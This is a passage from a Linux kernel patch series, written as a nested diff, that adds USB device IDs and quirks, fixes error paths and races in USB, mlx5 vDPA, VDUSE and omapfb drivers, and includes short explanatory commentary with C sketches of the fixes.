+@@ -447,6 +445,8 @@ static void __exit onboard_hub_exit(void)
+ {
+ 	usb_deregister_device_driver(&onboard_hub_usbdev_driver);
+ 	platform_driver_unregister(&onboard_hub_driver);
++
++	cancel_work_sync(&attach_usb_driver_work);
+ }
+ module_exit(onboard_hub_exit);
+ 
+diff --git a/drivers/usb/musb/omap2430.c b/drivers/usb/musb/omap2430.c
+index 476f55d1fec30..44a21ec865fb2 100644
+--- a/drivers/usb/musb/omap2430.c
++++ b/drivers/usb/musb/omap2430.c
+@@ -411,8 +411,10 @@ static int omap2430_probe(struct platform_device *pdev)
+ 		memset(musb_res, 0, sizeof(*musb_res) * ARRAY_SIZE(musb_res));
+ 
+ 		res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-		if (!res)
++		if (!res) {
++			ret = -EINVAL;
+ 			goto err2;
++		}
+ 
+ 		musb_res[i].start = res->start;
+ 		musb_res[i].end = res->end;
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index f6fb23620e87a..ba5638471de49 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -60,6 +60,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x0846, 0x1100) }, /* NetGear Managed Switch M4100 series, M5300 series, M7100 series */
+ 	{ USB_DEVICE(0x08e6, 0x5501) }, /* Gemalto Prox-PU/CU contactless smartcard reader */
+ 	{ USB_DEVICE(0x08FD, 0x000A) }, /* Digianswer A/S , ZigBee/802.15.4 MAC Device */
++	{ USB_DEVICE(0x0908, 0x0070) }, /* Siemens SCALANCE LPE-9000 USB Serial Console */
+ 	{ USB_DEVICE(0x0908, 0x01FF) }, /* Siemens RUGGEDCOM USB Serial Console */
+ 	{ USB_DEVICE(0x0988, 0x0578) }, /* Teraoka AD2000 */
+ 	{ USB_DEVICE(0x0B00, 0x3070) }, /* Ingenico 3070 */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index dee79c7d82d5c..6b69d05e2fb06 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -255,10 +255,16 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EP06			0x0306
+ #define QUECTEL_PRODUCT_EM05G			0x030a
+ #define QUECTEL_PRODUCT_EM060K			0x030b
++#define QUECTEL_PRODUCT_EM05G_CS		0x030c
++#define QUECTEL_PRODUCT_EM05CN_SG		0x0310
+ #define QUECTEL_PRODUCT_EM05G_SG		0x0311
++#define QUECTEL_PRODUCT_EM05CN			0x0312
++#define QUECTEL_PRODUCT_EM05G_GR		0x0313
++#define QUECTEL_PRODUCT_EM05G_RS		0x0314
+ #define QUECTEL_PRODUCT_EM12			0x0512
+ #define QUECTEL_PRODUCT_RM500Q			0x0800
+ #define QUECTEL_PRODUCT_RM520N			0x0801
++#define QUECTEL_PRODUCT_EC200U			0x0901
+ #define QUECTEL_PRODUCT_EC200S_CN		0x6002
+ #define QUECTEL_PRODUCT_EC200T			0x6026
+ #define QUECTEL_PRODUCT_RM500K			0x7001
+@@ -1159,8 +1165,18 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EP06, 0xff, 0xff, 0xff),
+ 	  .driver_info = RSVD(1) | RSVD(2) | RSVD(3) | RSVD(4) | NUMEP2 },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EP06, 0xff, 0, 0) },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05CN, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05CN_SG, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_GR, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_CS, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_RS, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_SG, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0x00, 0x40) },
+@@ -1180,6 +1196,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500K, 0xff, 0x00, 0x00) },
+diff --git a/drivers/usb/storage/uas-detect.h b/drivers/usb/storage/uas-detect.h
+index 3f720faa6f97c..d73282c0ec501 100644
+--- a/drivers/usb/storage/uas-detect.h
++++ b/drivers/usb/storage/uas-detect.h
+@@ -116,6 +116,19 @@ static int uas_use_uas_driver(struct usb_interface *intf,
+ 	if (le16_to_cpu(udev->descriptor.idVendor) == 0x0bc2)
+ 		flags |= US_FL_NO_ATA_1X;
+ 
++	/*
++	 * RTL9210-based enclosure from HIKSEMI, MD202 reportedly have issues
++	 * with UAS.  This isn't distinguishable with just idVendor and
++	 * idProduct, use manufacturer and product too.
++	 *
++	 * Reported-by: Hongling Zeng <zenghongling@kylinos.cn>
++	 */
++	if (le16_to_cpu(udev->descriptor.idVendor) == 0x0bda &&
++			le16_to_cpu(udev->descriptor.idProduct) == 0x9210 &&
++			(udev->manufacturer && !strcmp(udev->manufacturer, "HIKSEMI")) &&
++			(udev->product && !strcmp(udev->product, "MD202")))
++		flags |= US_FL_IGNORE_UAS;
++
+ 	usb_stor_adjust_quirks(udev, &flags);
+ 
+ 	if (flags & US_FL_IGNORE_UAS) {
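
[Editor's note] Because the RTL9210 bridge shares idVendor/idProduct with working devices, the UAS quirk has to key on the descriptor strings, and those pointers may be NULL, hence the guarded strcmp() calls in the hunk above. Sketch of the NULL-safe match:

#include <linux/string.h>
#include <linux/types.h>

/* Descriptor strings are optional; check the pointers before strcmp(). */
static bool is_md202(const char *manufacturer, const char *product)
{
	return manufacturer && !strcmp(manufacturer, "HIKSEMI") &&
	       product && !strcmp(product, "MD202");
}
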
+diff --git a/drivers/usb/storage/unusual_uas.h b/drivers/usb/storage/unusual_uas.h
+index 251778d14e2dd..c7b763d6d1023 100644
+--- a/drivers/usb/storage/unusual_uas.h
++++ b/drivers/usb/storage/unusual_uas.h
+@@ -83,13 +83,6 @@ UNUSUAL_DEV(0x0bc2, 0x331a, 0x0000, 0x9999,
+ 		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+ 		US_FL_NO_REPORT_LUNS),
+ 
+-/* Reported-by: Hongling Zeng <zenghongling@kylinos.cn> */
+-UNUSUAL_DEV(0x0bda, 0x9210, 0x0000, 0x9999,
+-		"Hiksemi",
+-		"External HDD",
+-		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+-		US_FL_IGNORE_UAS),
+-
+ /* Reported-by: Benjamin Tissoires <benjamin.tissoires@redhat.com> */
+ UNUSUAL_DEV(0x13fd, 0x3940, 0x0000, 0x9999,
+ 		"Initio Corporation",
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index de66a2949e33b..80d8c6c3be369 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -419,6 +419,18 @@ static const char * const pin_assignments[] = {
+ 	[DP_PIN_ASSIGN_F] = "F",
+ };
+ 
++/*
++ * Helper function to extract a peripheral's currently supported
++ * Pin Assignments from its DisplayPort alternate mode state.
++ */
++static u8 get_current_pin_assignments(struct dp_altmode *dp)
++{
++	if (DP_CONF_CURRENTLY(dp->data.conf) == DP_CONF_DFP_D)
++		return DP_CAP_PIN_ASSIGN_DFP_D(dp->alt->vdo);
++	else
++		return DP_CAP_PIN_ASSIGN_UFP_D(dp->alt->vdo);
++}
++
+ static ssize_t
+ pin_assignment_store(struct device *dev, struct device_attribute *attr,
+ 		     const char *buf, size_t size)
+@@ -445,10 +457,7 @@ pin_assignment_store(struct device *dev, struct device_attribute *attr,
+ 		goto out_unlock;
+ 	}
+ 
+-	if (DP_CONF_CURRENTLY(dp->data.conf) == DP_CONF_DFP_D)
+-		assignments = DP_CAP_UFP_D_PIN_ASSIGN(dp->alt->vdo);
+-	else
+-		assignments = DP_CAP_DFP_D_PIN_ASSIGN(dp->alt->vdo);
++	assignments = get_current_pin_assignments(dp);
+ 
+ 	if (!(DP_CONF_GET_PIN_ASSIGN(conf) & assignments)) {
+ 		ret = -EINVAL;
+@@ -485,10 +494,7 @@ static ssize_t pin_assignment_show(struct device *dev,
+ 
+ 	cur = get_count_order(DP_CONF_GET_PIN_ASSIGN(dp->data.conf));
+ 
+-	if (DP_CONF_CURRENTLY(dp->data.conf) == DP_CONF_DFP_D)
+-		assignments = DP_CAP_UFP_D_PIN_ASSIGN(dp->alt->vdo);
+-	else
+-		assignments = DP_CAP_DFP_D_PIN_ASSIGN(dp->alt->vdo);
++	assignments = get_current_pin_assignments(dp);
+ 
+ 	for (i = 0; assignments; assignments >>= 1, i++) {
+ 		if (assignments & 1) {
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 904c7b4ce2f0c..59b366b5c6144 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -4594,14 +4594,13 @@ static void run_state_machine(struct tcpm_port *port)
+ 		tcpm_set_state(port, ready_state(port), 0);
+ 		break;
+ 	case DR_SWAP_CHANGE_DR:
+-		if (port->data_role == TYPEC_HOST) {
+-			tcpm_unregister_altmodes(port);
++		tcpm_unregister_altmodes(port);
++		if (port->data_role == TYPEC_HOST)
+ 			tcpm_set_roles(port, true, port->pwr_role,
+ 				       TYPEC_DEVICE);
+-		} else {
++		else
+ 			tcpm_set_roles(port, true, port->pwr_role,
+ 				       TYPEC_HOST);
+-		}
+ 		tcpm_ams_finish(port);
+ 		tcpm_set_state(port, ready_state(port), 0);
+ 		break;
+diff --git a/drivers/vdpa/mlx5/core/mlx5_vdpa.h b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+index 6af9fdbb86b7a..058fbe28107e9 100644
+--- a/drivers/vdpa/mlx5/core/mlx5_vdpa.h
++++ b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+@@ -116,8 +116,9 @@ int mlx5_vdpa_create_mkey(struct mlx5_vdpa_dev *mvdev, u32 *mkey, u32 *in,
+ 			  int inlen);
+ int mlx5_vdpa_destroy_mkey(struct mlx5_vdpa_dev *mvdev, u32 mkey);
+ int mlx5_vdpa_handle_set_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
+-			     bool *change_map);
+-int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb);
++			     bool *change_map, unsigned int asid);
++int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
++			unsigned int asid);
+ void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev);
+ 
+ #define mlx5_vdpa_warn(__dev, format, ...)                                                         \
+diff --git a/drivers/vdpa/mlx5/core/mr.c b/drivers/vdpa/mlx5/core/mr.c
+index a639b9208d414..a4d7ee2339fa5 100644
+--- a/drivers/vdpa/mlx5/core/mr.c
++++ b/drivers/vdpa/mlx5/core/mr.c
+@@ -511,7 +511,8 @@ out:
+ 	mutex_unlock(&mr->mkey_mtx);
+ }
+ 
+-static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
++static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev,
++				struct vhost_iotlb *iotlb, unsigned int asid)
+ {
+ 	struct mlx5_vdpa_mr *mr = &mvdev->mr;
+ 	int err;
+@@ -519,42 +520,49 @@ static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb
+ 	if (mr->initialized)
+ 		return 0;
+ 
+-	if (iotlb)
+-		err = create_user_mr(mvdev, iotlb);
+-	else
+-		err = create_dma_mr(mvdev, mr);
++	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
++		if (iotlb)
++			err = create_user_mr(mvdev, iotlb);
++		else
++			err = create_dma_mr(mvdev, mr);
+ 
+-	if (err)
+-		return err;
++		if (err)
++			return err;
++	}
+ 
+-	err = dup_iotlb(mvdev, iotlb);
+-	if (err)
+-		goto out_err;
++	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] == asid) {
++		err = dup_iotlb(mvdev, iotlb);
++		if (err)
++			goto out_err;
++	}
+ 
+ 	mr->initialized = true;
+ 	return 0;
+ 
+ out_err:
+-	if (iotlb)
+-		destroy_user_mr(mvdev, mr);
+-	else
+-		destroy_dma_mr(mvdev, mr);
++	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
++		if (iotlb)
++			destroy_user_mr(mvdev, mr);
++		else
++			destroy_dma_mr(mvdev, mr);
++	}
+ 
+ 	return err;
+ }
+ 
+-int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
++int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
++			unsigned int asid)
+ {
+ 	int err;
+ 
+ 	mutex_lock(&mvdev->mr.mkey_mtx);
+-	err = _mlx5_vdpa_create_mr(mvdev, iotlb);
++	err = _mlx5_vdpa_create_mr(mvdev, iotlb, asid);
+ 	mutex_unlock(&mvdev->mr.mkey_mtx);
+ 	return err;
+ }
+ 
+ int mlx5_vdpa_handle_set_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
+-			     bool *change_map)
++			     bool *change_map, unsigned int asid)
+ {
+ 	struct mlx5_vdpa_mr *mr = &mvdev->mr;
+ 	int err = 0;
+@@ -566,7 +574,7 @@ int mlx5_vdpa_handle_set_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *io
+ 		*change_map = true;
+ 	}
+ 	if (!*change_map)
+-		err = _mlx5_vdpa_create_mr(mvdev, iotlb);
++		err = _mlx5_vdpa_create_mr(mvdev, iotlb, asid);
+ 	mutex_unlock(&mr->mkey_mtx);
+ 
+ 	return err;
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 444d6572b2d05..3a6dbbc6440d4 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -1823,6 +1823,9 @@ static virtio_net_ctrl_ack handle_ctrl_vlan(struct mlx5_vdpa_dev *mvdev, u8 cmd)
+ 	size_t read;
+ 	u16 id;
+ 
++	if (!(ndev->mvdev.actual_features & BIT_ULL(VIRTIO_NET_F_CTRL_VLAN)))
++		return status;
++
+ 	switch (cmd) {
+ 	case VIRTIO_NET_CTRL_VLAN_ADD:
+ 		read = vringh_iov_pull_iotlb(&cvq->vring, &cvq->riov, &vlan, sizeof(vlan));
+@@ -2391,7 +2394,8 @@ static void restore_channels_info(struct mlx5_vdpa_net *ndev)
+ 	}
+ }
+ 
+-static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
++static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
++				struct vhost_iotlb *iotlb, unsigned int asid)
+ {
+ 	struct mlx5_vdpa_net *ndev = to_mlx5_vdpa_ndev(mvdev);
+ 	int err;
+@@ -2403,7 +2407,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb
+ 
+ 	teardown_driver(ndev);
+ 	mlx5_vdpa_destroy_mr(mvdev);
+-	err = mlx5_vdpa_create_mr(mvdev, iotlb);
++	err = mlx5_vdpa_create_mr(mvdev, iotlb, asid);
+ 	if (err)
+ 		goto err_mr;
+ 
+@@ -2584,7 +2588,7 @@ static int mlx5_vdpa_reset(struct vdpa_device *vdev)
+ 	++mvdev->generation;
+ 
+ 	if (MLX5_CAP_GEN(mvdev->mdev, umem_uid_0)) {
+-		if (mlx5_vdpa_create_mr(mvdev, NULL))
++		if (mlx5_vdpa_create_mr(mvdev, NULL, 0))
+ 			mlx5_vdpa_warn(mvdev, "create MR failed\n");
+ 	}
+ 	up_write(&ndev->reslock);
+@@ -2620,41 +2624,20 @@ static u32 mlx5_vdpa_get_generation(struct vdpa_device *vdev)
+ 	return mvdev->generation;
+ }
+ 
+-static int set_map_control(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
+-{
+-	u64 start = 0ULL, last = 0ULL - 1;
+-	struct vhost_iotlb_map *map;
+-	int err = 0;
+-
+-	spin_lock(&mvdev->cvq.iommu_lock);
+-	vhost_iotlb_reset(mvdev->cvq.iotlb);
+-
+-	for (map = vhost_iotlb_itree_first(iotlb, start, last); map;
+-	     map = vhost_iotlb_itree_next(map, start, last)) {
+-		err = vhost_iotlb_add_range(mvdev->cvq.iotlb, map->start,
+-					    map->last, map->addr, map->perm);
+-		if (err)
+-			goto out;
+-	}
+-
+-out:
+-	spin_unlock(&mvdev->cvq.iommu_lock);
+-	return err;
+-}
+-
+-static int set_map_data(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb)
++static int set_map_data(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
++			unsigned int asid)
+ {
+ 	bool change_map;
+ 	int err;
+ 
+-	err = mlx5_vdpa_handle_set_map(mvdev, iotlb, &change_map);
++	err = mlx5_vdpa_handle_set_map(mvdev, iotlb, &change_map, asid);
+ 	if (err) {
+ 		mlx5_vdpa_warn(mvdev, "set map failed(%d)\n", err);
+ 		return err;
+ 	}
+ 
+ 	if (change_map)
+-		err = mlx5_vdpa_change_map(mvdev, iotlb);
++		err = mlx5_vdpa_change_map(mvdev, iotlb, asid);
+ 
+ 	return err;
+ }
+@@ -2667,16 +2650,7 @@ static int mlx5_vdpa_set_map(struct vdpa_device *vdev, unsigned int asid,
+ 	int err = -EINVAL;
+ 
+ 	down_write(&ndev->reslock);
+-	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
+-		err = set_map_data(mvdev, iotlb);
+-		if (err)
+-			goto out;
+-	}
+-
+-	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] == asid)
+-		err = set_map_control(mvdev, iotlb);
+-
+-out:
++	err = set_map_data(mvdev, iotlb, asid);
+ 	up_write(&ndev->reslock);
+ 	return err;
+ }
+@@ -2842,8 +2816,8 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 	int i;
+ 
+ 	down_write(&ndev->reslock);
+-	mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+ 	ndev->nb_registered = false;
++	mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+ 	flush_workqueue(ndev->mvdev.wq);
+ 	for (i = 0; i < ndev->cur_num_vqs; i++) {
+ 		mvq = &ndev->vqs[i];
+@@ -3021,7 +2995,7 @@ static void update_carrier(struct work_struct *work)
+ 	else
+ 		ndev->config.status &= cpu_to_mlx5vdpa16(mvdev, ~VIRTIO_NET_S_LINK_UP);
+ 
+-	if (ndev->config_cb.callback)
++	if (ndev->nb_registered && ndev->config_cb.callback)
+ 		ndev->config_cb.callback(ndev->config_cb.private);
+ 
+ 	kfree(wqent);
+@@ -3038,21 +3012,13 @@ static int event_handler(struct notifier_block *nb, unsigned long event, void *p
+ 		switch (eqe->sub_type) {
+ 		case MLX5_PORT_CHANGE_SUBTYPE_DOWN:
+ 		case MLX5_PORT_CHANGE_SUBTYPE_ACTIVE:
+-			down_read(&ndev->reslock);
+-			if (!ndev->nb_registered) {
+-				up_read(&ndev->reslock);
+-				return NOTIFY_DONE;
+-			}
+ 			wqent = kzalloc(sizeof(*wqent), GFP_ATOMIC);
+-			if (!wqent) {
+-				up_read(&ndev->reslock);
++			if (!wqent)
+ 				return NOTIFY_DONE;
+-			}
+ 
+ 			wqent->mvdev = &ndev->mvdev;
+ 			INIT_WORK(&wqent->work, update_carrier);
+ 			queue_work(ndev->mvdev.wq, &wqent->work);
+-			up_read(&ndev->reslock);
+ 			ret = NOTIFY_OK;
+ 			break;
+ 		default:
+@@ -3187,7 +3153,7 @@ static int mlx5_vdpa_dev_add(struct vdpa_mgmt_dev *v_mdev, const char *name,
+ 		goto err_mpfs;
+ 
+ 	if (MLX5_CAP_GEN(mvdev->mdev, umem_uid_0)) {
+-		err = mlx5_vdpa_create_mr(mvdev, NULL);
++		err = mlx5_vdpa_create_mr(mvdev, NULL, 0);
+ 		if (err)
+ 			goto err_res;
+ 	}
+@@ -3239,8 +3205,8 @@ static void mlx5_vdpa_dev_del(struct vdpa_mgmt_dev *v_mdev, struct vdpa_device *
+ 	struct workqueue_struct *wq;
+ 
+ 	if (ndev->nb_registered) {
+-		mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+ 		ndev->nb_registered = false;
++		mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+ 	}
+ 	wq = mvdev->wq;
+ 	mvdev->wq = NULL;
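
With the control and data virtqueue groups potentially living in
different address spaces, the set_map path above applies an incoming
IOTLB update only to the components whose group maps to the ASID the
update arrived on. A compact sketch of that routing, with stub update
functions standing in for the real MR rebuild and CVQ IOTLB copy (all
names here are illustrative):

    #include <stdio.h>

    enum { DATAVQ_GROUP, CVQ_GROUP, NGROUPS };

    struct dev { unsigned int group2asid[NGROUPS]; };

    /* Stand-ins for the real MR / IOTLB updates. */
    static int update_data_path_mr(void) { puts("data path MR updated"); return 0; }
    static int update_cvq_iotlb(void)    { puts("CVQ IOTLB updated");    return 0; }

    /*
     * Apply an IOTLB update only to the components whose group is
     * mapped to this ASID; both groups may share one ASID.
     */
    static int set_map(struct dev *d, unsigned int asid)
    {
            int err = 0;

            if (d->group2asid[DATAVQ_GROUP] == asid)
                    err = update_data_path_mr();
            if (!err && d->group2asid[CVQ_GROUP] == asid)
                    err = update_cvq_iotlb();
            return err;
    }

    int main(void)
    {
            struct dev d = { .group2asid = { 0, 0 } }; /* both groups on ASID 0 */

            return set_map(&d, 0);
    }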
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim_net.c b/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
+index 11f5a121df243..584b975a98a7e 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
+@@ -62,6 +62,9 @@ static bool receive_filter(struct vdpasim *vdpasim, size_t len)
+ 	if (len < ETH_ALEN + hdr_len)
+ 		return false;
+ 
++	if (is_broadcast_ether_addr(vdpasim->buffer + hdr_len) ||
++	    is_multicast_ether_addr(vdpasim->buffer + hdr_len))
++		return true;
+ 	if (!strncmp(vdpasim->buffer + hdr_len, vio_config->mac, ETH_ALEN))
+ 		return true;
+ 
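
The simulator change accepts broadcast and multicast destinations before
falling back to an exact MAC comparison. A userspace analogue, assuming
the usual Ethernet conventions that the kernel's
is_broadcast_ether_addr()/is_multicast_ether_addr() helpers encode
(all-0xff for broadcast, least significant bit of the first octet for
multicast):

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    #define ETH_ALEN 6

    /* Broadcast: all six octets 0xff. */
    static bool eth_is_broadcast(const uint8_t *addr)
    {
            static const uint8_t bcast[ETH_ALEN] =
                    { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
            return !memcmp(addr, bcast, ETH_ALEN);
    }

    /* Multicast: least significant bit of the first octet set. */
    static bool eth_is_multicast(const uint8_t *addr)
    {
            return addr[0] & 0x01;
    }

    /* Accept broadcast/multicast frames, else require an exact MAC match. */
    static bool receive_filter(const uint8_t *dest, const uint8_t *own_mac)
    {
            if (eth_is_broadcast(dest) || eth_is_multicast(dest))
                    return true;
            return !memcmp(dest, own_mac, ETH_ALEN);
    }

    int main(void)
    {
            uint8_t bcast[ETH_ALEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
            uint8_t mac[ETH_ALEN]   = { 0x02, 0x00, 0x00, 0x00, 0x00, 0x01 };

            printf("%d %d\n", receive_filter(bcast, mac),
                   receive_filter(mac, mac));  /* prints 1 1 */
            return 0;
    }

A broadcast address also has the multicast bit set, so the first test is
strictly redundant; keeping both mirrors the patch and documents intent.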
+diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
+index 35dceee3ed560..31017ebc4d7c7 100644
+--- a/drivers/vdpa/vdpa_user/vduse_dev.c
++++ b/drivers/vdpa/vdpa_user/vduse_dev.c
+@@ -1440,6 +1440,9 @@ static bool vduse_validate_config(struct vduse_dev_config *config)
+ 	if (config->config_size > PAGE_SIZE)
+ 		return false;
+ 
++	if (config->vq_num > 0xffff)
++		return false;
++
+ 	if (!device_is_allowed(config->device_id))
+ 		return false;
+ 
+diff --git a/drivers/video/fbdev/omap2/omapfb/dss/dsi.c b/drivers/video/fbdev/omap2/omapfb/dss/dsi.c
+index 54b0f034c2edf..7cddb7b8ae344 100644
+--- a/drivers/video/fbdev/omap2/omapfb/dss/dsi.c
++++ b/drivers/video/fbdev/omap2/omapfb/dss/dsi.c
+@@ -1536,22 +1536,28 @@ static void dsi_dump_dsidev_irqs(struct platform_device *dsidev,
+ {
+ 	struct dsi_data *dsi = dsi_get_dsidrv_data(dsidev);
+ 	unsigned long flags;
+-	struct dsi_irq_stats stats;
++	struct dsi_irq_stats *stats;
++
++	stats = kzalloc(sizeof(*stats), GFP_KERNEL);
++	if (!stats) {
++		seq_printf(s, "out of memory\n");
++		return;
++	}
+ 
+ 	spin_lock_irqsave(&dsi->irq_stats_lock, flags);
+ 
+-	stats = dsi->irq_stats;
++	*stats = dsi->irq_stats;
+ 	memset(&dsi->irq_stats, 0, sizeof(dsi->irq_stats));
+ 	dsi->irq_stats.last_reset = jiffies;
+ 
+ 	spin_unlock_irqrestore(&dsi->irq_stats_lock, flags);
+ 
+ 	seq_printf(s, "period %u ms\n",
+-			jiffies_to_msecs(jiffies - stats.last_reset));
++			jiffies_to_msecs(jiffies - stats->last_reset));
+ 
+-	seq_printf(s, "irqs %d\n", stats.irq_count);
++	seq_printf(s, "irqs %d\n", stats->irq_count);
+ #define PIS(x) \
+-	seq_printf(s, "%-20s %10d\n", #x, stats.dsi_irqs[ffs(DSI_IRQ_##x)-1])
++	seq_printf(s, "%-20s %10d\n", #x, stats->dsi_irqs[ffs(DSI_IRQ_##x)-1])
+ 
+ 	seq_printf(s, "-- DSI%d interrupts --\n", dsi->module_id + 1);
+ 	PIS(VC0);
+@@ -1575,10 +1581,10 @@ static void dsi_dump_dsidev_irqs(struct platform_device *dsidev,
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d %10d %10d %10d\n", #x, \
+-			stats.vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
+-			stats.vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
++			stats->vc_irqs[0][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[1][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[2][ffs(DSI_VC_IRQ_##x)-1], \
++			stats->vc_irqs[3][ffs(DSI_VC_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- VC interrupts --\n");
+ 	PIS(CS);
+@@ -1594,7 +1600,7 @@ static void dsi_dump_dsidev_irqs(struct platform_device *dsidev,
+ 
+ #define PIS(x) \
+ 	seq_printf(s, "%-20s %10d\n", #x, \
+-			stats.cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
++			stats->cio_irqs[ffs(DSI_CIO_IRQ_##x)-1]);
+ 
+ 	seq_printf(s, "-- CIO interrupts --\n");
